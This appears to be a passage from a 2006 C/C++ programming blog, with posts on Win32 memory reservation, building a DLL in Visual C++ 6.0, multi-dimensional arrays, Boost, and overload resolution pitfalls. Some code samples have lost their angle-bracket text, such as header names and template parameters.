What about this? We simply VirtualFree(cur_mem) and then VirtualAlloc($cur_mem, 2*cur_size)? This reduces the overhead of allocating new memory space, transfering data and yet gurantees the fixed memory address allocation. This solution may sound on paper, however it's almost guranteed to fail because of win32 memory management mechanism. First of all, VirtualFree and VirtualAlloc will fill the new allocated memory with 0; even if we disallow them to zero the pages, we cannot garantee that we will be dealing with the same physical page again upon task switch/kernel call gate control transfers. We may not look at the same physical page and even we are lucky to regain the same physical page, its contents may have been overwritten by another task or the kernel. So this approach will simply not work.


The next idea we could come up with is to allocate a new memory block that concatenates directly after the current memory block that is shown if the following graph. The idea is to allocate a new block of memory at the fixed address where the last fault occured. This idea seems rather plausible, the only drawback would be the hassle to clean this up. We have to VirtualFree every memory block that we allocate inside the exception handler. But still it sounds like a reasonble solution until we put this into implementation, VirtualAlloc would not return a useful memory address with the fixed bad address where the exception occured.



|-----------| <- cur_mem | | | | <- cur_mem->size
|-----------| <- concat_mem | | | | |-----------|

Ok, finally something that really works. The idea is to initially reserve a large chunk of memory and commit the memory upon demand. But this idea is really a static memory approach and would not really meet our requirement. Now imagine for a second how would you solve this problem?

Build DLL (dynamic linked library) with microsoft visual studio

This article explains how to work with the default microsoft VC 6.0 IDE to compile DLL output from a given c code. It also shows how to use this dll within another given c code.

Let's say you have 3 files, a_main.c, a_dll.c, and a_comm.h. Both .c files use the .h header files. Let's first generate a_dll.dll from a_dll.c. Double click a_dll.c in windows should automatically open a_dll.c within the VC IDE. If this is not the case, you need to associate .c files with VC ide. Next try to compile a_dll.c, at this point, VC will create a workspace template file for you. Now this is the point where you need to make changes to the default workspace/project settings so that instead of linking and producing a EXE file, a DLL file is generated. First set active configuration to win32 release, then open project/settings diaglog. Click on c/c++, this is the compilation settings. You need to put the following defines in the "preprocessor definitions" textfield, _USRDLL and A_DLL_EXPORTS. _USRDLL tells the compiler-preprocessor that this file is intended to be compiled into a DLL file. A_DLL_EXPORTS tells the compiler that this file as DLL exports symbols. A_DLL_EXPORTS is a instantiate of FILENAME_EXPORTS, because we are working with a_dll.c here, we replace FILENAME with A_DLL. If the file was named b_dll.c, we'd have used B_DLL_EXPORTS.

There is another flag _WINDOWS that needs to be added depending on the nature of the DLL. If the DLL has any USR32.DLL imports, working with GUI components, then we must replace the default _CONSOLE flag to _WINDOWS. The VC default project template settings assumes a win32 console application is being compiled. So use either _WINDOWS or _CONSOLE depending on what kind of DLL you are working with. Save your settings change by click on "Ok" button. At this point, a_dll.c should be compiled and seen to produce a_dll.obj without any problem.

Next we must modify the settings that used during VC linking process. The object code is linked with other libraries to produce either a EXE file or a DLL file. The default template project settings will link to a win32 console EXE file. Open the project/settings dialog again in VC and choose the "link" tab. In "Output filename" text field, change a_dll.exe to a_dll.dll. This change tells the linker we desire a dll output from the source code a_dll.c. If you didn't change this and go ahead compiling/linking your code, VC will complain it cannot find "main" or "winmain" function because as a dll source code, a_dll.c contains the dllmain entry instead of main for a console app or winmain for a windows app. In the "Project Options" textarea, get to the end of the option string and add "/dll", this again tells the linker to produce a dll output instead of a exe output.

The last step again depends on what kind of dll it is, console or windows. You don't have to do anything else if it's a console dll because the default setting assumes it's creating a console dll. Otherwise in "Project Options", find "/subsystem:console" and replace it with "/subsystem:windows". Click "Ok" to save the changes and in "Build" menu, you should see the target output has changed from a_dll.exe to a_dll.dll. You should be able to create the desired a_dll.dll now.

Granted, this seems to be a lot of hassle to get VC to generate DLL output from a source code file. This would have been very easy if we could have started from the project wizard and was using a win32 dll template from day 1. But occasionally one cannot always expect a project build configuration is available with a downloaded or copied source code and we have to build a dll file using what we have at hand. The trick I explained above demonstrates the step by step changes to the default project settings to genreate a dll file.

Now onto the next step building a.exe using the newly generated a_dll.dll. Again load a.c into VC and let VC generate a default project template file to work with. If you would try to build a.exe now, VC would complain missing functions in a_dll.c during link. To fix this, open Project/Settings, and go to link tab. In Object/library modules text, go to the end of the list and type in PATH_TO_A_DLL_LIB\a_dll.lib. Here PATH_TO_A_DLL_LIB is the path to a_dll.lib file. For example, if you have organized your files in c:\myfiles. PATH_TO_A_DLL_LIB would be Release or Debug depending on what build configuration was used when a_dll.dll was built. This is the only change you need to make to link a.obj with a_dll.lib to generate the final product: a.exe.

It's interesting to note that the compiler actually links a.obj with a_dll.lib instead of a_dll.dll to build a.exe. a_dll.dll is only used when a.exe is running in the system, as it's name implied dynamic link library.

Memory as a programming concept in C and C++, multi-dimensional arrays

C and C++ catogerize multi-dimensional arrays into two distinctively different kinds, static and dynamic.

Static multi-dimensional arrays are declared and defined at compile time. They are internally represented as one dimensional array and accessed through index arithmatic (addition and multiplication). For example, x[i][j] (whose size is nrow * ncol) is accessed by *(x + i*ncol + j) . Because they are represented in such a manner, they must be passed to functions with explicit array bounds information (except that the first dimension bound nrow can be omitted, x[3][4] can be passed as x[3][4] or x[][4]). Due to the same reason, static multi-dimensional arrays are passed by reference, namely the pointer value that points to the storage. C and C++ don't pass multi-dimensional arrays as values as that would require a tremendous amount of overhead involving momory copy, passing additional array structure information onto the stack call frame, even though the function declaration with static multi-dimensional array resembles pass-by-value semantics. The next example demonstrates the sutleties of C and C++ static multi-dimensional arrays:

#include

int a[3][4] = {0, 3, 4, 2, 1, 5, 6, 9, 8, 3, 2, 5};

void adjust(int x[][4]){

x[0][3] = 80;

}

int main(){

printf("a[0][3] = %d\n", a[0][3]);
adjust(a);
printf("a[0][3] = %d\n", a[0][3]);

return 0;
}

Dynamic multi-dimensional arrays are declared using pointer sematic and defined at run time, thus 'dynamic'. They are internally repesented as dynamic 1D arrays whose elements are pointers that point to sub-level dynamic 1D arrays. They are accessed by dereferencing pointer values. For example, int ** x is a pointer to 2 dimensional dynamic array; at run time, it's defined to point to an array of shape x[3][4],

x = malloc(3*sizeof(int *));
for(int i = 0; i < 3; i ++)
x[i] = malloc(4*sizeof(int));

It's important to distinguish between static and dynamic multi-dimensional arrays in C and C++ because even they are both multi-dimensional arrays, their definition, representation and access methods are so vastly different, they can be confusing even among the most seasoned developers.

Monday, May 15, 2006

Beyond the C++ standard library, an introduction to boost

I recently finished reading through this book. Very good introduction materials of boost libraries to us mortals. The covered libraries include utility classes such as shared_ptr, scoped_ptr, intrusive_ptr, weak_ptr, operators, noncopyable, regex etc; container classes such as any, variant, tuple; functional classes such as bind, lambda, functional, signal. These are the MVP classes that can make c++ programmers' lives much easier. The lambda libraries are especially impressive when binding functors with standard algorithm.

Boost (www.boost.org) development is very active. Check them out.

Monday, May 08, 2006

Default arguments do not participate in overload resolution

Consider the following code:

// (1)
template
void f(T const& x) {}

// (2)
template
void f(T const& x, typename T::some_type* = 0) {}

struct X { typedef int some_type; } x;

int main()
{
f(x);//Comeau choose #2. Does it conform to the Standard?

}

First, the compiler builds a viable function set. This is where SFINAE takes place and a function is either added or excluded from the set. According to 13.3.2/2

A candidate function having more than m parameters is viable only if the (m+1)-st parameter has a default argument (8.3.6).121) For the purposes of overload resolution, the parameter list is truncated on the right, so that there are exactly m parameters.

So, the viable set in this case contains functions with the default argument truncated.

Second, the compiler does partial template ordering and the actual overload resolution. Since the default argument for function 2 has been truncated, the viable function set here contains 2 identical functions which results in the ambiguity.

Overload resolution doesn't choose between names from different scopes.

Take this code example :

template
class Base
{
protected:
Notify(T& msg);

};

struct msgA {};
struct msgB {};

class Impl : public Base, public Base
{
void Do()
{
msgA a;
Notify(a); // <----- AMBIGUOUS call } } ; When compiled with Comeau online compiler, yeilds the following error:
Comeau C/C++ 4.3.3 (Aug  6 2003 15:13:37) for ONLINE_EVALUATION_BETA1
Copyright 1988-2003 Comeau Computing. All rights reserved.
MODE:strict errors C++

"ComeauTest.c", line 5: error: omission of explicit type is nonstandard ("int"
assumed)
Notify(T& msg);
^

"ComeauTest.c", line 17: error: "Base::Notify [with T=msgA]" is ambiguous
Notify(a); // <----- AMBIGUOUS call ^ 2 errors detected in the compilation of "ComeauTest.c".
This error is a result of disambiguity rule that C++ compiler employs when resolve overloaded names from different scopes. Although both names are visible at the point of the statement, the rule says overload resolution cannot choose between names from different scopes. Thus the compile error. A simple solution is to pull in names from both scopes into class Impl by using declarations.

With very few exceptions, name lookup must resolve to a set of names in a single scope. The major exception is when ADL is involved, but ADL only applies to namespaces which are searched, not base classes.

Friday, May 05, 2006

Why my class cannot be used in STL container?

The STL containers expect the class provides copy assignment operator and copy constructor. When a class does not have them, the code won't compile. The following rules dictate how a compiler generates default copy assignment operator for a class:

The compiler mustn't define an implicit copy assignment operator

if the class has:

-a nonstatic data member of const type, or

-a nonstatic data member of reference type, or

-a nonstatic data member of class type (or array thereof) with
an inaccessible copy assignment operator, or

-a base class with an inaccessible copy assignment operator.

Monday, May 01, 2006

Be careful of C++ conversion operator, road to ambiguity.

Originally by James Kanze from clcm (editted formatting)

> #include
> #include

> namespace my{
> class A{
> public:
> operator std::sring(){
> std::string rval;
> //do some work here
> return rval;
> };
> template
> operator TypeVal(){
> TypeVal rval;
> //do some work here...
> return rval;
> };

You left the above function out in your original posting. It makes a big difference.

> };
> };

> int main(){
> my::A a;
> std::string s=a; //will compile without problem

Yes. But:
std::string s( a ) ;
won't.

In your version, the compiler tries to convert a to an std::string, and then uses the copy constructor to initialize s. (The copy constructor can later be elided, but for the analysis in overload resolution, access control and all the rest, the compiler must behave as if it were called.) And there is only one way to convert a my::A to an std::string -- your conversion operator. (The compiler will favor a non-template function over a template function.)

My version, using direct initialization, looks for constructors of std::string which can be called with a single my::A argument. Because of the template conversion operator, this is in fact any constructor which can be called with a single argument; there are at least two, the copy constructor and the constructor from a char const*. Both involve a user defined conversion operator, so both are equally "good", and the call is ambiguous. (Note that in this case, the compiler will favor a non-template constructor of std::string over a templated one. But none of the constructors of std::string are templates, so this doesn't help.)

> s=a; //will not compile

Same problem as my version above. There are several assignment operators which can be called with a single argument, and my::A can be converted into just about any type of argument.

> };